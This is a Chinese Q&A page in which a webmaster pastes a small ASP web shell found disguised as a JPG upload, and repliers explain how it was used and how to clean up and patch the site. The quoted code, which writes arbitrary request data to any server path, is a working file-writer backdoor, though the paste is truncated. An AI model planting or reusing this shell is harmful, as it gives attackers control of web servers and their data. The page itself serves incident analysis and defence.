网站被人上传asp木马,请高手帮着解释如下代码。

来源:百度知道 编辑:UC知道 时间:2024/06/23 03:34:43
全部是700字节,后缀名是JPG的文件,通过UploadFile上传的。我网页上没有改名的地方,也有过滤,也添加了sql通用防注入系统,但是无效。照样改掉我所有的数据库数据。既然是jpg,不知道是怎么执行的,这段代码有何作用?
<%on error resume next%>
<%ofso="scripting.filesystemobject"%>
<%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="success"%>
<%else%>
<%="false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%=server.mappath(request.servervariables("script_name&

不知道你的网站数据库是什么格式的
是不是有备份数据库的功能
如果你没有关闭的话
他可以上传JPG 格式的
然后通过备份为ASP 格式的
这样来入侵的
他的这个代码是上传一个DIY 很小的马然后通过小马上传大马
说明你的网站肯定有漏洞
请修复

他是通过一个jpg文件去修改你的上传文件

清除:可以用DW批量查找<script language=javascript src=一个网址></script>然后删除 或者使用Macfee 或 网站被挂马批量清除工具 来清除木马。

在清理完木马以后,尽量查找出是哪里出了问题,导致被挂马 有如下i个原因:1:网站自身安全漏洞,在程序上存在安全问题 比如SQL注入或者upfile上传漏洞 等 所以只要查找出问题所在 这就很容易去修复了, 如果你使用网上提供的开源的程序,那我想也会有针对漏洞的补丁。再或者你修复不明白的话就删除或者禁用这个文件。
2:如果你使用的是虚拟主机的话 可能是受同服务器下其他网站影响

3:如果你是单独服务器 在自身网站没问题的情况下,可能是ARP